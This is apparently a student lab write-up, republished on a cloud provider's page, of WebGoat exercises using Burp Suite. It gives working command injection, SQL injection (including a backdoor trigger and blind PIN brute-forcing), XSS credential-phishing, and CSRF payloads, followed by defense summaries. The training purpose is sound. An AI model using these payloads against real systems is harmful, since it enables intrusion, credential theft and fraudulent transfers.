Home > Developer > Web Develop

20155236 Fanchen Song _web Security Basic Practice

Source: Internet
Author: User
Tags sql injection attack csrf attack
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

20155236 Fanchen Song _web Safety Basic Practice Directory
    • Practical goals
    • WebGoat
    • Burpsuite
    • Injection Flaws
    • Cross-site Scripting (XSS)
    • Summarize
Practical goals
    • (1) Understand the basic principles of common network attack technology.
    • (2) Webgoat experiment in practice.
WebGoat
    • Webgoat is a flawed Java EE Web application maintained by the famous owasp, which is not a bug in the program, but is deliberately designed to teach Web application security courses. This application provides a realistic teaching environment that provides clues to the user completing the course.
    • Because Webgoat is a Java-based software, it is platform agnostic and can be operated on a variety of operating platforms, so the system for this experiment is Kali machine
    • Run the related package by entering the following command on the commands line jar
      • java -jar webgoat-container-7.0.1-war-exec.jar
    • Webgoat uses port 8080 by default, so you can start by seeing the prompts:INFO: Starting ProtocolHandler ["http-bio-8080"]
Burpsuite
    • Burp Suite is an integrated platform for attacking Web applications. It contains a number of tools and has designed many interfaces for these tools to facilitate the process of speeding up attacks on applications.
    • Configuring the native Burpsuite
      • Proxy->OptionSelect add Add Item in, set proxy IP and its port (I set 8088 and 127.0.0.1), select Start after Add run
      • In the browser (for example in Firefox), Preferences->Advanced select Settings , tick Manual proxy configuration , enter the IP and port you just set
      • Then Proxy->intercept click on ' Intercept is off ' to enable proxy
Injection Flawscommand Injection
    • This interface can execute system commands and return them to the user, so you should add shell commands to the request and executeifconfig
    • Specifically, use the tool mentioned earlier to BurpSuite intercept the request and change its parameters to (mine is):
      • AccessControlMatrix.help"& ifconfig"
      • Represents the execution of these 2 instructions, at the end of the page can see the results of ifconfig, successful
Numeric SQL Injection
    • Requirements: Try SQL injection so that all the weather can be found
    • The idea is also very simple, directly constructs the eternal truth type, can find all records
    • You can either follow the idea of the previous question with a tool to modify the package, or you can directly press F12 modify the Web page source file, you need to find the value to:101 or 1=1
    • Click Go to see all the city's weather, success
Log Spoofing
    • The title of the topic is to write a SQL string because the page will return you the wrong username, so our goal is to make the page return to your results as shown by your login success
    • So in the user name that constructs the statement:gq%0d%0aLogin Succeeded for username: admin
Lab:sql injectionstage 1:string SQL Injection
    • According to the description, it is required that you do not know the password premise, you can also log on successfully
    • That can only be injected with SQL, the use of SQL-related syntax, the use of pre-and post- closure, the formation of a permanent , the problem is more basic, a lot of construction methods, I use is‘or 1=‘1
    • Note that: If the direct write forever, will exceed the character length limit, and the general ever-true style exceeds the limit of 8 characters, so you have to F12 view the source code, the length of the password input to expand, and then inject, or you can construct a password, so as far as possible to close, such as my password, just 8 characters.
    • In order to get permission, it is best to choose Admin Login, the last left column will be prompted to succeed
Stage 2:parameterized Query #1
    • This did not test success, finally found that the topic has such a sentence, maybe only the development version can be successful

    • This LESSON only WORKS with the DEVELOPER VERSION of WEBGOAT

Stage 3:numeric SQL Injection
    • Title: Login to Larry Account, but can view boss's information
    • So first of all, based on Stage 1 the Universal key to get Larry permissions, so we can click ViewProfile to see the relevant information, obviously at this time only to find their own information
    • But scrutiny its principle is not difficult to find the same as before, at this time to look at the boss information, in essence or query the database field for the boss of the record and output, so can still be injected on the request, the difference is that there is no input box to provide the injected string, so we have to use the previous article mentioned in the BurpSuitetool, block the request package at this time, construct the SQL request parameter, and employee_id change the value to101 or 1=1
    • But after testing it still shows Larry's message, guess is because the interface is too small to display only one? I can inject all the information into this, so how to make it output the first one is we want the boss information?
    • Careful observation of Larry's information table can be found Salary in this field, indicating that the data table is also present, then for a boss to pay the highest, I can pay for the condition, the query results are sorted, the structure of the SQL statement as follows:
      • 101 or 1=1 order by salary desc
      • Success, boss salary 450k, after all boss!
Stage 4:parameterized Query #2
    • Stage 2only successful on the development version.
String SQL Injection
    • Requirements: You must enter the correct last name to log in
    • Obviously I do not know anything, can only use the universal key to try, according to the preceding article input:
      • ‘or 1=‘1
      • Success, because for the ever-true, so any user information is seen
Database backdoors
    • According to the topic request is to you to use multiple statements of SQL injection, update the data table
    • Based on the previous blog's multiple statement injection exercises, here, set the following SQL statement:
      • 101; update employee set salary=10000
      • Find data sheet all personnel pay equals 10000 has been updated, successful
    • The above is the first step requirements, the second step requirements: more advanced is to insert the back door, the bottom of the back door as if to create a new user will automatically modify the mailbox for your mailbox
      • 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘[email protected]‘WHERE userid = NEW.userid
Blind Numeric SQL Injection
    • Digital blinds, some times there is SQL injection, but not get the information we need, at this time can be judged by the conditions of the SQL statement, blind.
    • For example, we know one cc_number=1111222233334444 , but want to know the value of its pin in pins table, you can use the blind to burst, enter
      • 101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 10000 );
      • Open the BurpSuite tool to listen, capture the first request message, because we need to try again and again we can use the tool to brute force
    • Right-click the message selection and send to intruder Intruder Select the relevant settings below:
      • In Target , set the native IP address host, and the port number, which is the address and port number of the Webgoat
      • In the Positions , select the Sniper mode, then use the cursor to select the variable that needs brute force, here is the account_number value after, then click on the right side of the add add (click to clear Clear All)
      • In, select the type of number Payloads , then set the range of changes, and set the step size to 1, so that you can pinpoint the number of packet changes, so that we are able to confirm the location
      • In Options , select Start attack start attack
    • Find the location of packet size change 2364 , log in with 2364, success!
Cross-site Scripting (XSS) Phishing with XSS
  • Reflective XSS is the most common and widely used type of attack. It sends a URL with malicious script code parameters to others, and when the URL address is opened, the unique malicious code parameter is parsed and executed by HTML. It is characterized by non-persistence and must be clicked by a user with a link with a specific parameter.
  • Enter the code below into the text box, XSS will cause a phishing login screen to cheat the login account and password
  • </form>  <script>function hack(){Xssimage=NewImage;Xssimage.src="Http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + Document.Phish.User.value + "&password=" + Document.Phish.Pass.value + "";Alert("Had this been a real attack ... Your credentials were just stolen. User Name = " + Document.Phish.User.value + "Password =" + Document.Phish.Pass.value);}   </script><form name= "Phish" ><br><br><HR>><Br>  <Br>Enter Username:<Br>  <input type="Text"Name="User">  <Br>Enter Password:<Br>  <input type="Password"Name= "Pass"><Br>  <input type="Submit"Name="Login"Value="Login"OnClick="Hack ()"></form><br><br><HR>
Stored XSS Attacks
    • This is the most typical example of storage-type XSS, because the user's input is not encoded, so user a can be arbitrary input, and then user B click on User A's message, triggering the XSS, resulting in the recruit
    • Here's how it's done:
      • Title can be arbitrary input, according to the first attempt can be found that the input can be as a hyperlink update saved in this interface, click to view the input content
      • Message input messages, can embed a section of JS code, the user clicks can be triggered, such as input:<script>alert("20145221 attack succeed!");</script>
Reflected XSS Attacks
    • According to the topic can be known that this is a reflective XSS attack, similar to the first, in the location of the interactive input has an XSS vulnerability, directly constructs a script can launch an attack, for example, enter the following code to succeed:
      • <script>alert("20145221 attack succeed!");</script>
Cross Site Request forgery (CSRF)
    • Here is an example of a storage-type XSS and CSRF combination, CSRF is an imposter login, and a code forgery request
    • Here is the use of CSRF malicious code storage-type XSS on the Web page, through the message message input, the construction of malicious code as follows
      • <iframe src="attack?Screen=504&amp;menu=900&amp;transferFunds=5000"></iframe>
      • When the user clicks this message, it will be triggered, showing that has been transferred 5000 yuan
      • Note: The values of the screen and menu parameters above are consistent with those displayed on the right side of the site
      • If you want the user to be able to <iframe> set the length and width parameters to 1 pixels in the case of no-sleep, it is not visible.
Summarize the principle of SQL injection attack, how to defend the principle
    • is by inserting a SQL command into a Web form to submit or entering a query string for a domain name or page request, eventually reaching a malicious SQL command that deceives the server.
    • Specifically, it is the ability to inject (malicious) SQL commands into the background database engine execution using existing applications, which can be obtained by entering (malicious) SQL statements in a Web form to a database on a Web site that has a security vulnerability, rather than executing the SQL statement as the designer intended.
Defense
    • Check the variable data type and format
      • If your SQL statement is similar where id={$id} to this form, all the IDs in the database are numbers, then you should check to make sure that the variable ID is int type before SQL is executed, and if you accept the mailbox, you should check and strictly ensure that the variable must be the format of the mailbox, other types such as date, Time is also a reason. Summing up: As long as there are fixed-format variables, before the SQL statement execution, you should strictly follow the fixed format to check, to ensure that the variables are the format we expected, which can largely avoid SQL injection attacks.
    • Filter Special Symbols
      • For variables that cannot be determined in a fixed format, special symbolic filtering or escaping is a must. In PHP, for example, it is usually used addslashes函数 , which adds a backslash escape before the specified predefined character, which is the single quotation mark (') Double quotation mark (") backslash () NULL.
    • Binding variables, using precompiled statements
      • MySQL's mysqli driver provides support for precompiled statements, and different programming languages, each with a method that uses precompiled statements
      • The advantage of this is that if I enter the password: ‘or 1=‘1 then he will only be treated as a password and will not be associated with other structures of the SQL statement
The principle of XSS attack, how to defend the principle
    • A malicious attacker inserts malicious script code into a Web page, and the program does not filter the user's input, and when the user browses to the page, the script code embedded inside the Web is executed to achieve the special purpose of the malicious attacker.
Defense
    • One way to do this is to filter the required parameters before the form commits or the URL parameters are passed.
    • Reliable input validation of all user submissions on input, including URLs, query keywords, HTTP headers, post data, and more
    • In terms of output, labels are used in user-input content <XMP> . The contents of the tag are not explained and displayed directly.
    • Strictly enforce character input word control, because the XSS code is often many, so to control the number of characters
CSRF attack principle, how to defend the principle
    • Cross-site request forgery, where an attacker steals your identity and sends a malicious request on your behalf.
    • The things that CSRF can do include: Send mail in your name, message, steal your account, even buy goods, virtual money transfer
    • Issues include: personal privacy breaches and property security.
Defense
    • Verification Code
      • A verification code can be added during certain sensitive operations to confirm the identity of the user
    • Token
      • CSRF can attack success, the root cause is: The parameters of the operation is the attacker guessed. Now that we know the root cause, we have the right remedy and use token. When passing parameters to the server, take the token. This token is a random value and is held by both the server and the user. When a user submits a form with a token value, the server can verify that the token in the form and session is consistent.
Experimental Thoughts
    • In the field of security, the color of the hat is generally used to describe the hacker's good and evil, "white hat" and "Black Hat" is two completely opposing groups. For the Black hat, they can only find a point of the system to achieve the purpose of intrusion, and the white hat must be all of its own system can be breached in order to ensure the safe operation of the system.
    • It seems unfair, but the rules in the safe world are like this, maybe our site 99% is well-armed and thoughtful, but as long as 1% of the local negligence, the attackers use this 1% must be able to make breakthroughs, let us another 99% in vain.

20155236 fanchen _web Security Basics Practice

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
ccna security practice test comptia security practice test security practice test 401 ccna security practice questions security online practice exam security practice questions comptia security practice

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More